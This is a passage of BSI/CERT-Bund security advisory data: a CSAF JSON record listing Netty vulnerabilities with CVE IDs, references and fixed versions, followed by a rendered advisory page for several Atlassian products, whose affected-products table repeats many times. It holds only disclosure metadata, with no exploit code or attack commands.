"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Netty ist ein asynchrones, ereignisgesteuertes Netzwerk-Anwendungs-Framework f\u00fcr die schnelle Entwicklung von wartbaren, hochleistungsf\u00e4higen Protokollservern und -clients.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Netty ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand zu verursachen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1372 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1372.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1372 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1372"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-2c5c-chwr-9hqw vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-38f8-5428-x5cv vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-45q3-82m4-75jr vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-57rv-r2g8-2cj3 vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-cm33-6792-r9fm vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-f6hv-jmp6-3vwv vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-jfg9-48mv-9qgx vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-jfg9-48mv-9qgx"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-m4cv-j2px-7723 vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-mj4r-2hfc-f8p6 vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-mj4r-2hfc-f8p6"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-rwm7-x88c-3g2p vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-rwm7-x88c-3g2p"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-v8h7-rr48-vmmv vom 2026-05-05",
"url": "https://github.com/advisories/GHSA-v8h7-rr48-vmmv"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-v8h7-rr48-vmmv vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-v8h7-rr48-vmmv"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-xxqh-mfjm-7mv9 vom 2026-05-05",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
},
{
"category": "external",
"summary": "Keycloak 26.6.3 release vom 2026-06-04",
"url": "https://www.keycloak.org/2026/06/keycloak-2663-released"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8401-1 vom 2026-06-08",
"url": "https://ubuntu.com/security/notices/USN-8401-1"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:2308-1 vom 2026-06-09",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-June/026653.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:24502 vom 2026-06-10",
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:23808 vom 2026-06-10",
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:25123 vom 2026-06-11",
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
}
],
"source_lang": "en-US",
"title": "Netty: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-06-10T22:00:00.000+00:00",
"generator": {
"date": "2026-06-11T10:21:04.274+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1372",
"initial_release_date": "2026-05-05T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-05-05T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-05-06T22:00:00.000+00:00",
"number": "2",
"summary": "CVE erg\u00e4nzt"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "3",
"summary": "Referenz(en) aufgenommen: EUVD-2026-30130, EUVD-2026-30124, EUVD-2026-30127, EUVD-2026-30129, EUVD-2026-30128, EUVD-2026-30126, EUVD-2026-30123, EUVD-2026-30122, EUVD-2026-30120, EUVD-2026-30125, EUVD-2026-30132, EUVD-2026-30121"
},
{
"date": "2026-06-04T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates aufgenommen"
},
{
"date": "2026-06-08T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2026-06-09T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-06-10T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "7"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c26.6.3",
"product": {
"name": "Open Source Keycloak \u003c26.6.3",
"product_id": "T054992"
}
},
{
"category": "product_version",
"name": "26.6.3",
"product": {
"name": "Open Source Keycloak 26.6.3",
"product_id": "T054992-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:keycloak:keycloak:26.6.3"
}
}
}
],
"category": "product_name",
"name": "Keycloak"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c4.2.13.Final",
"product": {
"name": "Open Source Netty \u003c4.2.13.Final",
"product_id": "T053584"
}
},
{
"category": "product_version",
"name": "4.2.13.Final",
"product": {
"name": "Open Source Netty 4.2.13.Final",
"product_id": "T053584-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:netty:netty:4.2.13.final"
}
}
},
{
"category": "product_version_range",
"name": "\u003c4.1.133.Final",
"product": {
"name": "Open Source Netty \u003c4.1.133.Final",
"product_id": "T053585"
}
},
{
"category": "product_version",
"name": "4.1.133.Final",
"product": {
"name": "Open Source Netty 4.1.133.Final",
"product_id": "T053585-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:netty:netty:4.1.133.final"
}
}
}
],
"category": "product_name",
"name": "Netty"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42577",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42577"
},
{
"cve": "CVE-2026-42578",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"product_status": {
"known_affected": [
"T054992",
"T053584",
"T002207",
"67646",
"T000126",
"T053585"
]
},
"release_date": "2026-05-05T22:00:00.000+00:00",
"title": "CVE-2026-44248"
}
]
}
WID-SEC-W-2026-1955
Vulnerability from csaf_certbund - Published: 2026-06-16 22:00 - Updated: 2026-06-17 22:00Summary
Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Bamboo ist ein Werkzeug zur kontinuierlichen Integration und Bereitstellung, das automatisierte Builds, Tests und Freigaben in einem einzigen Arbeitsablauf verbindet.
Bitbucket ist ein Git-Server zur Sourcecode-Versionskontrolle.
Confluence ist eine kommerzielle Wiki-Software.
Fisheye ist ein Quellcode-Repository-Browser für Unternehmensteams.
Crucible ist eine Code-Review-Lösung für Unternehmensteams.
Jira ist eine Webanwendung zur Softwareentwicklung.
Angriff: Ein Angreifer kann mehrere Schwachstellen in Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management ausnutzen, um beliebigen Code auszuführen, erweiterte Berechtigungen zu erlangen, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszulösen.
Betroffene Betriebssysteme: - Sonstiges
- UNIX
- Windows
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
